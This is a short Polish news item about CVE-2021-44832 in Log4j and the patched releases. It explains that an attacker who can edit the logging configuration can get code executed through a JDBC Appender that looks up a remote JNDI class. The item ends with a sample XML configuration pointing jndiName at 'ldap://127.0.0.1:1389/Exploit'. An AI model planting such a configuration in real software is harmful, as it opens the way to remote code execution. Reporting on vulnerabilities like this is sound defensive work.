Opublikowano poprawki dla bibliotek Log4j 2.17.1, 2.3.2-rc1 i 2.12.4-rc1, w których usunięto kolejną lukę (CVE-2021-44832). Zgłoszono, że problem umożliwia zdalne wykonanie kodu (RCE), ale został oznaczony jako niezagrażający (CVSS Score 6.6) i głównie jest teoretycznie interesujący, ponieważ wymaga specyficznych warunków do wykorzystania — atakujący musi mieć możliwość modyfikacji pliku konfiguracyjnego Log4j, tzn. musi mieć dostęp do atakowanego systemu i uprawnienia do zmiany wartości parametru konfiguracji log4j2.configurationFile lub wnoszenia zmian w istniejące pliki z ustawieniami logowania.
Atak polega na określeniu w lokalnym systemie konfiguracji opartej na JDBC Appender, która odwołuje się do zewnętrznego URI JNDI, a w przypadku zapytania może zostać zwrócony klasa Java do wykonania. Domyślnie JDBC Appender nie jest skonfigurowany do obsługi protokołów innych niż Java, tzn. bez zmiany konfiguracji atak jest niemożliwy. Ponadto problem ujawnia się tylko w pliku JAR log4j-core i nie dotyczy aplikacji, które używają pliku JAR log4j-api bez log4j-core. <Appenders> <JDBC name="databaseAppender" tableName="dbo.application_log"> <DataSource jndiName="ldap://127.0.0.1:1389/Exploit"/> … <\/JDBC> <\/Appenders>
Źródło: opennet.ru
